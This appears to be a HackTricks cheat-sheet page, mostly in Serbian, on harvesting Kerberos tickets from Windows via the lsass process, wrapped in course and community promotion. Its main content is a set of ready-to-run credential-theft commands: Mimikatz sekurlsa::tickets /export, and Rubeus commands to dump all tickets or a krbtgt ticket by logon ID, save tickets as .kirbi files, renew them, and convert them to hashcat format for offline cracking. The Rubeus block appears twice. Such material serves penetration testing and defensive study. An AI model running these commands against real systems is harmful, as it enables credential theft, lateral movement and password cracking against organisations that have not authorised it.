Harvesting tickets from Windows

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Tiketima u Windows-u upravlja i čuva ih proces lsass (Local Security Authority Subsystem Service), koji je odgovoran za upravljanje bezbednosnim politikama. Da bi se ovi tiketi izvukli, potrebno je interagovati sa lsass procesom. Korisnik koji nije administrator može pristupiti samo svojim tiketima, dok administrator ima privilegiju da izvuče sve tikete na sistemu. Za takve operacije, alati Mimikatz i Rubeus se široko koriste, svaki nudi različite komande i funkcionalnosti.

Mimikatz

Mimikatz je svestran alat koji može interagovati sa bezbednošću Windows-a. Koristi se ne samo za vađenje tiketa, već i za razne druge operacije vezane za bezbednost.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus je alat posebno prilagođen za interakciju i manipulaciju Kerberosom. Koristi se za ekstrakciju i rukovanje tiketima, kao i za druge aktivnosti povezane sa Kerberosom.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Kada koristite ove komande, obavezno zamenite mesta kao što su <BASE64_TICKET> i <luid> sa stvarnim Base64 kodiranim tiketom i Logon ID-jem. Ovi alati pružaju opsežnu funkcionalnost za upravljanje tiketima i interakciju sa bezbednosnim mehanizmima Windows-a.

References

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Previous88tcp/udp - Pentesting Kerberos NextHarvesting tickets from Linux

Last updated 4 months ago

# Dumping all tickets using Rubeus .\Rubeus dump [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) # Listing all tickets .\Rubeus.exe triage # Dumping a specific ticket by LUID .\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) # Renewing a ticket .\Rubeus.exe renew /ticket:<BASE64_TICKET> # Converting a ticket to hashcat format for offline cracking .\Rubeus.exe hash /ticket:<BASE64_TICKET>